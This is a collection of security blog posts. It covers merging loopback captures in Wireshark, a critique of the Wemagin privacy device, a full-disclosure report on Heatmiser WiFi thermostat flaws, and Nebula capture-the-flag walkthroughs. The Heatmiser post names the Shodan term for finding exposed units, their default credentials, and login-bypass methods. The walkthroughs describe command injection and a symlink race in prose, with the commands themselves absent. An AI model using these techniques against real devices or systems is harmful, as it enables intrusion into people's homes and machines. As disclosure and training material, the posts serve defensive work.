Capturing and viewing loopback and external traffic in Windows

I am working on an issue at the moment that requires me not only to observe TCP/IP traffic leaving a box, but also going in-between processes on the same box.

Wireshark installs WinPcap in Windows, which unfortunately doesn’t allow you to capture traffic on the loopback ( interface.

Thankfully, there is a very useful piece of software available called RawCap. This is a tiny freeware application that lets you use raw sockets to capture loopback traffic on a Windows machine, like so:

The problem with RawCap is that it only lets you capture a single interface at a time (and it also seems to have a number of issues collecting traffic for interfaces other than loopback unless you are running XP).

So we use RawCap to capture loopback. At the same time, start a capture in Wireshark as usual.

Stop the capture in Wireshark, and save it. Go to File->Merge… and select the file created by RawCap.

The two captures will now be interleaved, courtesy of the absolute timestamps used in pcap files.

(note, merge really doesn’t seem to work well if you capture from different machines, probably due to clock differences).

Wemagin is Wemaginary

When Anonabox appeared on the crowd funding scene last month, a lot of information security professionals and privacy advocates were rightly annoyed by the dishonest claims made by the creators. Many of us spent quite a while raising questions and promoting concerns on various forms of media, until thankfully Kickstarter suspended the project. We don’t actually know what the final trigger was, but we do know that a concerted effort by a focused group can stop crowd funding projects in their tracks.

Since Anonabox, many more privacy projects have appeared. There are Tor routers that don’t make outlandish claims.  There is Anonabox on Indiegogo. There is also Wemagin.

Wemagin has a glossy website, professional videos, very bold claims, and some very vehement (but also, incredibly stupid) supporters.

Initial concerns

Wemagin make some bold, very assertive claims that set my alarm bells ringing:

  1. No trace is left on the computer that the device is used on
  2. No trace is left on the Internet when you use the device (including when accessing your banking website)
  3. It can run on any computer/it requires nothing from the computer to operate/can be used with public PC
  4. It can be used inside countries like North Korea safely

Why are these so worrying? Because there is no way that they are true.

1. No trace is left on the computer that the device is used on

This simply isn’t possible with modern operating systems.

The second you insert a USB device into a normal Windows machine, it leaves a plethora of traces. Some are very obvious (openly in the registry), others not so obvious, and some can only be recovered using advanced forensic techniques. This would at least prove you had used the Wemagin device.

Run an executable, startup a VM or create a new network interface and you leave even more trace behind. Wemagin is going to have to do one or more of these to work.

One supporter said “you can run things from the PC ram alone alone”. This really isn’t true anymore with an application of any size. Even if it was, the second a laptop or desktop hibernates, it writes the RAM to disk. This can then be forensically analysed – leaving a trace. It is very difficult to prevent or remedy this.

Wemagin could say that they leave “little trace”, but they don’t – they say “no trace”.

2. No trace is left on the Internet when you use the device (including when accessing your banking website)

Wemagin seems to be a VPN and browser package. A VPN will make it appear as if you are using the Internet from another IP address.

If you visit a website, the website logs will still have a record of your visit, albeit with a different IP to the IP of the PC you are using. This is not “no trace”.

Login to a website, and there will be a record of that login happening. This is not “no trace”

Your ISP is also capable of logging your connection to Wemagin’s VPN servers. They wouldn’t be able to observe the traffic, but they would know you had established a VPN connection.

Tracking cookies and other techniques (such as browser fingerprinting) mean that you can be tracked across multiple sites. Log into one site and you can be tracked to others even if using a VPN.

Using a VPN leaves less trace (or, at least, a more convoluted one), but calling it “no trace” is not true.

3. It can run on any computer/it requires nothing from the computer to operate/can be used with public PC

Setting up a VPN and running a browser from a USB memory device isn’t a trivial action on a PC. You will need to be able to access the USB port, the system will have to mount the USB device, be able to run executables from the USB device, establish a network connection to a given IP and port, possibly create a new network adapter. Often one or more of these will be disallowed on a public PC.

Our local library PCs run Symantec Endpoint, preventing USB sticks from being used without a password, and even then, no executables are allowed. There are other serious restrictions in what can be done – only a few select applications can be run. Web access is via a locked down proxy that cannot be reconfigured. This is fairly common on public PCs I have seen in airports, hotels, and schools.

It is also perfectly possible for firewall and filters to detect VPN usage even on non-standard ports. The traffic is encrypted but it isn’t magically disguised. Many corporate environments will flag and alert techniques used to evade filters.

Wemagin might have been doing something clever to get around these issues, but the creator has confirmed that they aren’t.

4. It can be used inside countries like North Korea safely

The Wemagin video shows emaciated North Korean children and talks of death penalties. They very strongly imply that using the Wemagin device in North Korea is safe.

Mainstream VPNs are not adequately safe for all purposes inside of North Korea or China without following a lot of OPSEC rules and being very careful.

VPNs alone are not enough to protect your privacy if your adversary is a nation state – especially if you are claiming that it is so easy to use that your grandmother can use it.

Further issues

Those 4 issues were the ones that made me concerned. Looking deeper though, there are many, many more issues:

5. With a VPN you are reliant on trusting the VPN provider to stay anonymous

A VPN server – especially one that is a paid for service – has to have at least some notion of who is using it and what they are doing. This in turn means you are reliant on the VPN provider holding no logs and not co-operating with law enforcement/government.

This is a dangerous position to be in if you are relying on the anonymity and privacy of the VPN to keep you safe from harm.

Many European countries and the US have sweeping surveillance rules that can compel ISPs and telecoms providers to wire tap their customers without telling you.

Simple VPNs are fine for people in Western countries who want to bypass web filters or watch Netflix in another region. They are not fine for political activists in repressive regimes.

6. It’s even more complex with a VPN with end-points in multiple countries

There are already countless VPN providers, but they tend to operate their servers in single countries – normally countries that value privacy and have no/low data retention laws.

Wemagin however claims to have VPN end points in 12 countries.

This means that, to keep their users safe, Wemagin need to manage the legal situation in 12 countries.

Steve Kim, the creator has inferred he is not interested in doing this though:

We are dealing with technology capability, not legality disputes.

Again, fine if you just want to watch Netflix in the US from Amsterdam. Not if you are trying to overthrow the government in Iran.

7. The cloud storage is encrypted, but Wemagin also hold the keys

The creator has loosely confirmed that both the customer and Wemagin will hold the encryption keys for the data in the cloud:

Question: [you] will not meet our needs because using the Dropbox model means Wemagin will have access to users’ stored files, and may be able to turn them over to 3rd parties. Will you be offering VPN service without the bundled cloud storage?
Answer: Our cloud is given for free with our VPN. Wemagin has the ability to view. We are not concerned about what you have. At this stage, we need to trust each other.

Wemagin can give the keys to anyone. The keys could be leaked, or obtained by a hacker.

Again, this means that you have to rely solely on trust to protect your data.

Note: This is likely because it is re-labelled cloud storage from another provider.

8. Loads of wishy-washy words and no technical detail.

“Military grade”, “Fast Download Speed” and so on.

There is a total lack of any technical detail on how the system works. For a system that is meant to be shipping in 3 months, this is worrying.

It reminds me of when you ask a kid to invent something: “I invented a spaceship to go to Mars and then we can live on a space base”. The idea is there, but none of the technical know-how.

9. Worldwide patent pending

Another common snake-oil salesman tactic.

There is no worldwide patent system to start with. Patent pending means you have applied for a patent and it has yet to be granted.

But often patents on snake-oil products are on things like cosmetic appearance or other trivialities e.g. the colour and shape of the USB stick, or something totally unrelated to the key selling points like the way a menu can appear or the exact steps needed to login.

This would appear to be the case for Wemagin – the US20130024931 A1 patent largely concerns the UI and usability of a USB stick. It doesn’t even mention VPNs. There’s brief mention of leaving no trace on the host machine:

The operating system operates on the host computer without the host computer being able to detect and store information related to the operation of the flash memory device.

But no description of how this could be achieved.

Rather amusingly, there is an image in the patent like so:

Imagination is more important than knowledge!

That says quite a lot.

10. Strange wagers to people wanting to test the product

Rather than just… you know… send the product to be tested, you need to go to China and stump up $10k of your own cash.

This seems a fairly common tactic with snake-oil salesmen.

11. Incoherent responses from the creators that fail to address any concerns

Just read the most recent update to backers.

So little of this makes any sense. There is a strong theme of paranoia and also deflection from any of the serious questions.

Steve’s comments aren’t any better. The one where he searches for Rajan’s details, gets them wrong, and then goes on a paranoid rant about competitors is particularly good.

12. An implausibly large team

Really? This many people have worked on a project that has virtually no technical detail? Why are eight law firms involved?

13. The cloud storage appears to be re-labelled

A quick google site search of gets us to a login page for WCLOUD – presumably the cloud storage.


First thing of note – this is not HTTPS. This means that your credentials can be sniffed. There’s not really any excuse for this.

But then, let’s look at the source of the page:

Whilst the form is on the Wemagin site, it is submitting the credentials (in the plain, again) to – an unlimited cloud storage provider.

You pay £39.99 a month to be an unlimited reseller of

Are they not even planning on keeping this in-house? has no particular privacy or anonymity focus.

Reselling or using another provider is fine. But you need to be honest about this, especially when you make such bold claims about your product.

14. The VPN appears to be re-labelled IPVanish

The main Wemagin video shows the UI and list of servers used by the VPN.

The UI is virtually identical to the UI of IPVanish. The servers have the same names. IPVanish also have a programme to re-label their product.

Again, re-labelling is fine, but IPVanish is not the VPN solution you need if you are dealing with nation state adversaries.

15. There is an open admin interface on the Wemagin servers

A google site search of leads to an admin page which has no authentication at all and no encryption.


This page leaks customer details including email addresses and key serial numbers.

16. The WCLOUD webpages have Google analytics tracking

As someone on 4chan pointed out, the WCLOUD webpages have Google analytics code in them.


This is actively harming your privacy and anonymity.

17. The logins used in the promotional video actually worked

The promotional video showed logins using the onscreen keyboard.

These logins actually worked.


Just more evidence pointing to a total lack of awareness of security.

18. Running anything on an untrusted machine is incredibly dangerous

It’s suggested Wemagin can be used on any machine safely. It’s very, very hard to run anything on an untrusted machine safely.

The host OS can see everything, even if the guest OS is running inside a VM.

On-screen keyboards are not adequate protection against a hostile machine.

There are frequently vulnerabilities that allow data to flow between guest and host OS.

19. A team member has admitted to attempting to smear critics

Team member Paul Lee of Cannysage Studios admitted to making a post on a totally unrelated forum calling me a racist.

Steve Kim has said that you need to trust them. How can you trust a company that acts like this?

20. Clear astroturfing

Paul Lee, a team member, was posting as Paul.

Ruth Read, who says she invested in Wemagin 3.5 years ago, is also posting comments saying she can’t wait to receive the product.

21. The USB stick is off the shelf

“Four separate molds have been made.”

“There are 4 manufacturers on standby.”

But it’s just a off the shelf USB stick from China.

22. Silently altering important details of the project

Before. After.

Notice how some of the claims have gone:
“No digital footprint left on the USB device to track”
“No cache, cookies or history on the computer”
“Masked IP address”

Before. After.

Notice how “no trace” has gone, and “beta” has turned up.

Also, they seem to have got rid of “The Team” on the main Wemagin page. Right after the team member Paul Lee admitted to smearing me.

23. Already tried and failed with WCLOUD

It looks like WCLOUD has been about for a while. Previously, it wasn’t motivated by privacy, secrecy, North Korea or anything like that. It was a lot cheaper.

24. Paying people to promote Wemagin

There are numerous Craigslist job adverts asking for people to promote Wemagin. How many of the people supporting the project are paid?


Would you trust a privacy product that has this many inconsistencies, exaggerations, and problems?

I know I wouldn’t.

Most of these issues could be cleared up by an improved technical specification along with some changes to the claims.


We have questions for Steve:

  1. Is this designed to be used inside North Korea, China, Iran, and Syria safely?
  2. Is Wemagin “low trace” (leaves no trace visible to some with average skills) or “no trace” (leaves no trace even after detailed forensic examination)?
  3. Is Wemagin re-labelling cloud and VPN services from other providers?
  4. Your beta testers and security testing have missed some very obvious problems. How are these going to be addressed?


Why am I doing this? Shouldn’t a small start-up have every chance to deliver this project?


I am absolutely fine with companies producing tools to help middle-aged white men in Western countries access porn without their spouses knowing.

I am absolutely fine with companies producing tools to help school-kids bypass restrictive firewalls preventing them accessing the Anarchists Cookbook.

I am not absolutely fine with companies producing tools where they claim to be able to protect people in repressive regimes when everything indicates this is going to put them at great risk.

I am not absolutely fine with companies using emotive images like emaciated children in North Korea to make a quick buck.

Wemagin started as a project with outlandish claims but the behaviour of the creator has put it into the territory of outright dishonesty.

I am not a competitor to Wemagin.

I am not being paid to criticise Wemagin.

Nothing I have said here is untrue or unfair. There is a worrying tendency at the moment for people to call any robust, reasonable criticism “bullying“. It isn’t bullying – it’s other people telling you that what you are saying is not adding up. You are free to respond to concerns, free to contact me, free to point out if anything I have said is untrue.

Yet, supporters of Wemagin think it is:

Really, who are the bullies here?

The bullies are Wemagin. All of the image links here are on Imgur to avoid any accusations of tampering.

On Sunday, I saw hits coming from a car forum called NASIOC: (no link, as private).

I visited the site to find a user, Wardroid, posted a thread entitled “Racist Cyber bully” claiming I had said “jap tech is overrated”:

The thread has since been deleted – because it was against the rules of the forum – but here is the google cache:

I have no way of proving that I didn’t do something, but most people who know me would say it would be extremely out of character to post something like that. It’s also really the job of the accuser to prove something like that.

The user who started the thread “Wardroid” has posted several videos to youtube as user “canny3d”:

You’ll note that this video is by “Cannysage Studios”.

You may recognise this name from where he is listed as a video consultant:

When asked about this on twitter, Paul Lee said:
“I got an anonymous email that you were a racist and don’t like asians.”

So a team member of Wemagin got an anonymous email that I am racist, found absolutely zero evidence of this, went onto a car forum and posted a thread to incite abuse.

Of course, we need to link this to Paul from Kickstarter.

This post of the forum uses a link to my page “Bad companies”, something with the user Paul has taken issue with before:

It also uses very similar language to Paul’s post:

He’s self-claimed ‘hacker’ and security researcher, lol. viral material in development.

also claiming that you are a ‘hardware hacker,’ LOL.

The forum post was made on the forum very shortly after Paul was banned from commenting on Kickstarter after threatening to disclose my personal address and mentioning that he had gone through my photos (which were then mentioned in the forum post):

I have further evidence that Paul Lee of Cannysage Studios is harassing me but it steps across the line of “doxxing” to post it. So I won’t.

Heatmiser WiFi thermostat vulnerabilities

Update – if your heating is misbehaving you need to disable port forwarding to port 80 and port 8068. This should be simply following the reverse of whatever you did to set port forwarding up. Alternatively, you could disable WiFi entirely by putting invalid SSID and password in – I believe the thermostats should continue to work.

Contact for an official response.


A while back, I came across a page listing some vulnerabilities on Heatmiser’s Netmonitor product. The Netmonitor is old and discontinued though, so maybe some lessons have been learnt.

I thought I’d take a quick look at the rest of their product line. They have a series of products, generally called WiFi thermostats that connect directly to your router using 802.11b. The products aren’t listed on their site (possibly removed after reporting this), but this Amazon listing gives you an idea.

This is a WiFi thermostat running version v1.2 of the firmware. There are newer versions of the firmware – up to v1.7 as far as I can see.

A quick look at the manuals shows that Heatmiser recommend two ports are forwarded to the thermostat from the router- port 80 for web control and port 8068 for app control.

Port forwarding

Port forwarding to a small embedded device is an easy way to get access to the device remotely, but it also puts you at risk. That device is now entirely open to the wider Internet on port 80 and 8068.

Also of note – a quick google search for port 8068 shows that the Heatmiser is the most common reason to have port 8068 open. This makes finding Heatmiser thermostats much easier. Scanning for them on port 80 is slow. Port 80 could be any web page,  so you need to check for port 80 being open, connect, perform a HTTP request, and then check the content of a web page (e.g. does the title contain “Heatmiser”).

Scanning for Heatmiser thermostats on port 8068 really just requires a quick check for port 8068 being open – we can be fairly confident that anything with this port open is one of their devices.  We can then make detailed check on port 80.

nmap can easily do this scan. If you want to scan large blocks of addresses though, masscan is much faster.

However, other people have already done the hard work for us – Shodan search engine scans all IPs, connects to port 80 and records the results. We just need a search term. This is simple – the title of the page is always “Heatmiser Wifi Thermostat”.

Plugging this into Shodan we get over 7000 results. That’s quite a lot. (note, you might need to register to use filters like this).

Shodan results

Issue 1 – default web credentials and PIN

To configure the thermostat, you connect with USB and use a Windows utility. In here you can set the username/password for the web interface and the PIN for port 8068 app access.

Heatmiser app

The application defaults to admin/admin and PIN 1234.

Even the manual suggests the default username and password.

Defaults in manual

It’s essential that an internet connected device enforces a custom password of decent strength. This isn’t even suggested or prompted for, never mind enforced.

Heatmiser’s response is that the password should be changed. My response is that their software shouldn’t allow defaults.

Issue 2 – wifi credentials and password can be seen in the plain

When logged into one of the devices, the username, password, WiFi SSID and WiFi password are all filled into the form and can be viewed easily by examine the source of the webpage.

There is really no excuse for this – it’s lazy.

Issue 3 – in-browser user input validation/sanitising

Viewing the source of several pages, it can be seen that the user input input is being validated and sanitised by Javascript.

JS input checks

Why is this an issue? Because often this means no checks are done by the device itself after input is submitted. All you need to do to pass invalid or dangerous data is not use a web-browser to send requests. Use a custom client that performs the same action without the validation.

This opens up many potential attacks.

This seems quite common with low-end processors connected to the Internet. The browser has a lot more power and is a lot more responsive, so checks in-browser often seem attractive.

Issue 4 – open to CSRF attacks

Once logged into the device with a given client (e.g. Chrome), other clients on the same machine can access the device as if they were logged in.

This enables an attack technique called cross-site request forgery. It means that I can send a user a link containing a malicious request and the device will blindly carry it out. For example, I could send a request to change the password to one of my choosing in an email, and as long as the user has logged into the thermostat recently, that request will be carried out by the device.

Best practice would dictate that only requests from pages generated by the device itself would work.

There are a number of ways to protect against CSRF – it’s actually quite complex to do, but this device has no protection at all.

It gets worse though. It appears the authentication works only by IP address. Once the thermostat sees you have logged in from a  given IP address, any requests from that IP address will work.

This is a really bad thing to do.

Most homes and workplaces use something called NAT on their routers. This means that all of your laptops, PCs, phones, consoles and tablets all appear to have the same IP to anyone looking from the outside. If I log in to my thermostat from work, it’s likely that the IP address the thermostat sees is also in use by a number of other people.

This means that if I log in to my thermostat at work, anyone else in my workplace can access my thermostat simply by visiting the page without any need for credentials.

As I said, protecting against CSRF is hard but this is as vulnerable as it gets to CSRF.

Issue 5 – no rate limiting or lockout on the port 8068 PIN

The Android and iPhone apps access the device on port 8068 using a custom protocol. Part of this involves sending the 4 digit PIN number to authenticate the app.

A 4 digit PIN only has 10,000 combinations and no username component. This makes brute forcing a PIN number very easy, so it is vital that there is rate-limiting or a lockout e.g. maximum 3 failed PIN attempts followed by a 10 minute lockout.

There is no rate limiting on the WiFi thermostats. You can try about 2 PINs/second over the Internet i.e. going through all 10,000 PINs takes about 1.5hr.

Now and then requests time-out when attempting PINs rapidly, but I suspect this is just a limitation of a low-power embedded device.

Even a fairly conservative lockout of 10 minutes after 3 wrong attempts would increase this to 23 days.

I have written a proof-of-concept to brute force the PIN but don’t want to release it openly currently.

Issue 6 – no means of updating firmware without a physical programmer and taking the device apart

Fixing issues in embedded, Internet connected devices requires a firmware update.

The WiFi thermostat appears to have no way of doing this remotely or via the web interface. It requires borrowing a programmer from Heatmiser (after paying a deposit), removing the device from the wall and updating it.

This is such a large barrier that very few people are going to do it. This creates an ethos and dynamic where neither the company or the customer is driven to fix or deploy security issues. The source for this little nugget of info started from this page here – where someone describes the process in the comments.


Issue 7 – trivial web authentication bypass

Go to the IP of any Heatmiser thermostat in a browser and you get the login box (often along with an annoying Javascript pop-up telling you the username/password is wrong for no reason).


Give it the right password and you end up on a framed window with several bits of HTML.

Main page

Each one of these frames is a .htm file. Trying each of these one by one, it’s found that left.htm can always be accessed regardless of the login status. This is the left hand menu.


From here all of the menu items work fine (even if the individual .htm files didn’t work directly).

You can go to the “Password” page, view the source, and then recover the password and login normally.

This means that gaining remote access to these thermostats is as easy as going to:

This is really not good.

Edit – the reason this happens is that the Javascript redirect (issue 8 below) has an error in it on left.htm…

Issue 8 – part of the authentication is Javascript based (up to v1.7)

Most of the thermostat pages have this little Javascript snippet on them:

This checks to see if you are logged in. If you aren’t, you get redirected back to the login page.

This would be a great idea if the same piece of HTML didn’t also include the content that you aren’t supposed to see.

You are letting the bad guys in regardless, and hoping you kick them out quickly enough not to see anything.

All you need to do to view the protected pages – including the one with the password in the open – is view the page in a browser with Javascript turned off, or use wget.

This is amongst the most awful security design I have ever seen.

Issue 9 – commands are carried out by unauthenticated HTTP POST

Most people who use a web browser will be familiar with HTTP GET to send data to the server at the other end. Google queries are the most obvious:

There is another mechanism called POST. You don’t see these in the URL like GET, but the idea is very similar.

All you need to do to change settings on the thermostat is send a POST request. No password required.

The barrier to entry here is that you can’t just type POST requests into the URL bar. But it isn’t exactly hard.

That’s just a grab from Burp Suite sending a request to a thermostat to change the time.

But you can seemingly change any setting.


I’ve stopped looking for issues at this point. There are probably a wealth of other things that could be worth investigating, including:

  • Fuzzing the port 8068 input. Custom protocols are often vulnerable to malformed inputs causing crashes
  • Hidden webpages
  • Backdoor accounts
  • Firmware inspection

But, at this point, it looks like security is the last thing on the list of priorities for Heatmiser.

If you want a thermostat that can’t be activated by just about anyone, then I would suggest returning your Heatmiser WiFi thermostat.

My recommendation would be to stop port-forwarding to both port 80 and 8068. You will lose remote control, but would still be able to access the thermostat from inside your house.

You can contact Heatmiser on if you need help dealing with this.

Heatmiser’s response

I emailed Heatmiser to inform them of these issues.

I believe they must have been aware of some or all of these issues before now, and due to the severity and basic nature of the issues, I decided to follow full disclosure.

They have responded as follows:

Thank you for your email.
We are investigating the issues you mention and will provide an update to fix the security issues you highlight. We will advise customers in the meantime to close port 80 on their WiFi Thermostat until the issue has been rectified.
Once again, thank you for bringing this to our attention.

Heatmiser’s solution

Heatmiser have sent an email/letter out to customers. They have two options – replace the thermostat with one without a web interface and with rate limiting on the pin, or get a refund.

I’m surprised there is no attempt to fix the web interface.

Here is the Letter from Heatmiser sent out.

How many microcontrollers does a quadcopter have on it?

I was sat on the floor last night, wiring up new bits and pieces to my quadcopter, and it dawned on me that there are an awful lot of microcontrollers on it.

  1. Each electronic speed control (ESC) has an ATmega328 onboard (4, total 4)
  2. The flight controller has an STM microcontroller, CP2102 serial->USB bridge, MPU-6050 3-axis gyro/accelerometer, HMC5883L compass, MS5611 barometer (5, total 9)
  3. The FrSky X8R receiver has at least one microcontroller in it (1, total 10)
  4. The SBUS to CPPM converter has at least one microcontroller in it (1, total 11)
  5. The FrSky Variometer has at least one microcontroller in it (1, total 12)
  6. The FrSky FLVSS voltage monitor has at least one microcontroller (1, total 13).
  7. The SimpleBGC gimbal controller has 2 microcontrollers (1 main, 1 for yaw), a serial to USB bridge, another accelerometer and gyro (4, total 17)
  8. The GoPro will have at least 3 microcontrollers inside it (2 for camera, 1 in SD card) (3, total 20)

That is a lot to potentially go wrong.


Nebula exploit exercises walkthrough – level12

There is a backdoor process listening on port 50001.

My experience with Lua is minimal at best, but it’s pretty obvious that the hash() function calls a shell command, and allows for command injection.

To run getflag is very simple:

And if you want to pass the check for the hash for fun, it is also simple:

Nebula exploit exercises walkthrough – level11

The /home/flag11/flag11 binary processes standard input and executes a shell command.

There are two ways of completing this level, you may wish to do both :-)

Now it gets interesting. This is the first bit of code where it isn’t obvious what the intent is from a quick glance.

I think I have found three ways to get this to execute getflag, though one is just a variation of another.

The code reads from stdin, then checks for “Content-Length: “, reads a length integer, and then processes this.

There are a number of paths from this point. If the length is less than the buf length (1024), then fread is called. Then there is a bug.

This is what happens on this code path:

But later on:

From the man page of fread:

size_t fread(void *ptr, size_t size, size_t nmemb, FILE *stream);

The function fread() reads nmemb elements of data, each size bytes
long, from the stream pointed to by stream, storing them at the loca‐
tion given by ptr.

fread() and fwrite() return the number of items successfully read or
written (i.e., not the number of characters).

Whilet both read in the same data, the return values will be different. The first will return 1, the second will return the number of chars read.

This means the only way to get to process with the length less than 1024 is to set the length to 1. This restricts our options a fair bit.

We’ll try it out though:

As expected, the value we pass (E, arbitrary choice) gets “processed” to become D. system is then called, but because we can only provide a single character, we can’t null terminate the command, and we get some random values after.

We can see these values vary each time we run it:

One thing that does happen though is that, by chance, we end up with a null being in the right place:

This is pure luck. The rest of buffer is uninitialized and nulls are common in uninitialised memory.

If we now symbolic link D to /bin/getflag, and alter the path so it runs D when the null is in the right place:

Hmmph. Why is it not the flag account? I think this is a bug – the call to system isn’t preceded by setresuid/setresgid, so anything it runs will run as the real UID (level11) instead of the effective UID (flag11).

Co-incidentally, I had recently read of a technique to fill uninitialised memory. It’s virtually useless in the real world – using uninitalised memory is indicative of much bigger issues. It’s interesting though, so let’s try it here.

This technique uses an environment variable called LD_PRELOAD. This is commonly used to override library functions for debugging (or exploits!). When the linker starts up, it reads the entirity of LD_PRELOAD onto the stack and then doesn’t clean up afterwards. This means we can initialise the memory to something under out control:

i.e. fill the stack with one thousand /bin/getflags.

Then when we run flag11 with length of 1, it will almost certainly have this in the buffer already:

Again the same issue with suid/system, but I think it counts.

Now we need to come back to the length being 1024 or more. What happens here?

There is a really simple encryption function:

We can easily build the reverse of this in Python and output a string:

(note, that I terminated the command with newline (x0a) to start with, which was causing this to fail)

We can then pipe this into the executable, to run the command:



Whilst playing around with this level, I thougut there might be something I could do with the random path/filename that is used when the content length is 2014 or greater.

The filename is normally of the form:

As seen from strace. This is PID (process ID) with a “random” string.

We can gain control of this string, the filename, and stop it from being deleted. This uses LD_PRELOAD, but for it’s genuine use.

First, we must check that the executable is dynamically linked:


Now we need to create a c file to override the functions we want – random(), unlink() and getpid():

The we compile it into a library, set LD_PRELOAD, and then run the executable:

And now we have control of the filename, and it is preserved rather than deleted.

Not of any real use, but a handy technique.

Nebula exploit exercises walkthrough – level10

The setuid binary at /home/flag10/flag10 binary will upload any file given, as long as it meets the requirements of the access() system call.

I think I can already see the problem.

Firstly, we can see that the token file we need to read out is permissioned such that level10 cannot see it:

On line x above, we have the following:

From the man page of access:

access() checks whether the calling process can access the file path‐

The check is done using the calling process’s real UID and GID, rather
than the effective IDs as is done when actually attempting an operation
(e.g., open(2)) on the file.

So we check the file permissions using the real UID (level10), but then later on we do:

and open uses the effective UID, and as the executable has suid, this means flag10.

This is commonly called a time-of-use to time-of-check or TOCTOU bug (Wikipedia’s example is pretty much exactly the same issue)

If we can swap out the file between the time-of-check and the time-of-use, we should be able to send token.

First, let’s just check the program works as expected.

Setup a listening netcat on my host using:

And then run it on nebula with a file we have access to:

And we receive it at the other end, plus a little banner:

Ok – so how do we explout the race condition? The best way to swap the file about is to use symolic links again. How do we time that though? I’m fundamentally a lazy person, so let’s try and just swap out the files as quickly as we can and hope it works.

First, let’s setup a loop that flips a symbolic link from the real token to a fake one repeatedly:

The f switch on ln makes sure we overwrite the existing symbolic link. The &amp at the end puts the job into the background.

Then let’s setup the listening netcat to keep on listening rather than exit using the k switch.

And finally, let’s run flag10 repeatedly using another bash one-liner:

Go back to netcat and we have the token:

There we go – the password for flag10.

Nebula exploit exercises walkthrough – level09

There’s a C setuid wrapper for some vulnerable PHP code…

I’m no PHP expert – this one took me a long time. There are two functions that look dubious there – file_get_contents and preg_replace. Let’s see what it is meant to do.

It looks like it reads the file provided as the first argument ($filename) and does nothing with a second argument ($use_me). The file read in is expected to be in the format:

and it returns a string like so:

You can use the command to get an arbitrary file that flag09 is permissioned for:

But we need to execute something, not read something.

Look closely at one of the preg_replace lines:

This looks like, for the 2nd matching term, run the spam function on it. The second term is substituted inside the spam() function, then executed. Maybe we can inject a command here.

I’ve recently done a couple of XSS tutorials/games, which have given me a fair bit of practice at command injection (in Javascript, though), and felt I was getting quite natural and good at it. However, this PHP one ended up being just a big case of trial and error.

I started trying to execute phpinfo() – it nearly always works and doesn’t need any parameters passing to it.

Right – this just echos the command.

Ok – it’s now treating phpinfo as a variable, but that variable isn’t defined.

Now we have passed an expression with invalid syntax…

Yes! Ok – so this strange notation with curly braces works. I’m not quite sure why it needs to be like this, but now I have it, I can find examples of people using it.

Now we need to run getflag. PHP has system to do system calls.

Hmm. It is escaping the inverted commas so it doesn’t work. In fact, it seems to escape anything helpful

Coming back to one of the examples above – we managed to get it to treat phpinfo as a variable. What happens if we try to use the unused parameter, use_me?

Right – so we can use that to pass in a string. Let’s combine the two.

Excellent! I got there in the end. It felt a little painful. If the second parameter hadon’t been called use_me, and this wasn’t an exploit wargame, I would have given up. Not happy with this level.

Nebula exploit exercises walkthrough – level08

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.

A readable pcap file in the flag08 home directory. This is a network capture, so might have some interesting traffic.

Now… we can read this on the terminal using tcpdump:

Even when it is this prettied up, it’s still hard work – especially if it is a keyboard interactive process. People using the keyboard expect instant feedback – they press a key, they what to see the screen change. This means that there is a lot of back and forth. Compare this to, say, a request for a web page, which is machine generated and will fit neatly into packets.

So I want to get this file into Wireshark on my local machine. How can we do that? netcat!

(note that these instructions have OS X as the remote end – the command name and options syntax vary from OS to OS)

On the host machine, we do the following:

Listen on port 2001, and pipe any output to the file capture.pcap.

and on the client (Nebula machine) we do this:

Connect to port 2001 and pipe capture.pcap down the connection.

Now we have our file at the other end, it is an easy taste to run Wireshark and open the capture.Wireshark

There is a single connection between two given IPs here. The trace is still hard to follow though, so go to Analyze -> Follow TCP stream. This gives us a nice, coherent conversation:

We can see a login to another machine. We are just going to have to hope for some password re-use. The password bit looks like:

However, those . are not . – they are characters not represented by display characters. Switch the view to hex view and we can see:

Hex view

Hex view

x7f – DEL (well, backspace). That makes the password backd00Rmate

Nebula exploit exercises walkthrough – level07

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.

The code of the CGI script is provided (and can be viewed in /home/flag07):



# check if Host set. if not, display normal page, etc


Immediately you can see this is not sanitising or validating the input parameter Host that it passes to a command – ping. We can therefore pass it another command for it to execute.

Let’s test the script out, from the command line to start with:

(I’ve stripped out HTML as I am lazy and can’t be bothered getting it to format correctly).

It just runs ping against localhost, as expected.

Run it without parameters, and we get the help:

And then let’s check we can inject a command:


The challenge now is that, for the first time, this script isn’t set to run suid. If I try running getflag, it isn’t going to work.

That thttpd.conf file in flag07’s home directory looks interesting. Could he be running a test web server?

Excellent – a web server on port 7007.

So, we need to:

  • Connect to the web server running on localhost at port 7007
  • Request a index.cgi
  • Pass a Host parameter with a command being careful to URL escape all of the special chars

wget is a simple utility present on nearly all Linux boxes that allows us to get a webpage.

We just need to escape the semi-colon to be %3B.

Check the content of the file and we have run getflag as a flag07.